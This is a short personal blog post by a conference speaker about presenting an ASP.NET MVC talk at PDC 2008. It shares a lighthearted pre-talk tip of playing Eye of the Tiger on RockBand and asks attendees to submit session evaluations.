Before giving a presentation, I review Scott Hanselman’s top 11 presentation tips. Well I have a twelfth tip that Scott needs to add to his list, and he’ll vouch for this.

A couple of hours before Jeff and I gave the ASP.NET MVC presentation (the video is now posted!), we played some RockBand in the Big Room (exhibition area).

Playing Eye of the Tiger before a big talk is a great way of both pumping you up and loosening you up at the same time. When I ran into Scott and told him this tip, he said he did the very same thing, playing Eye of the Tiger on RockBand before his talk. In his case, I think he played for two hours.

In any case, I felt like my talk went well. Jeff was entertaining as always and provided that taste of real-world relevance to what we’re doing with ASP.NET MVC. I particularly liked it when he remoted into his live server and showed the audience how his 8 CPU server was doing via task manager.

In any case, if you watched my talk, be sure to submit evals (higher numbers mean better; whoever gave me all 1s, that’s just mean! ;). I look forward to hearing your feedback. I’d love to be able to show people that there’s a demand for this type of framework and development model (transparency, source releases, etc…) and maybe we can get more than one MVC talk next time. I think it’s time I do a really advanced one. :)

Technorati Tags: pdc2008,aspnetmvc,presentation,pdc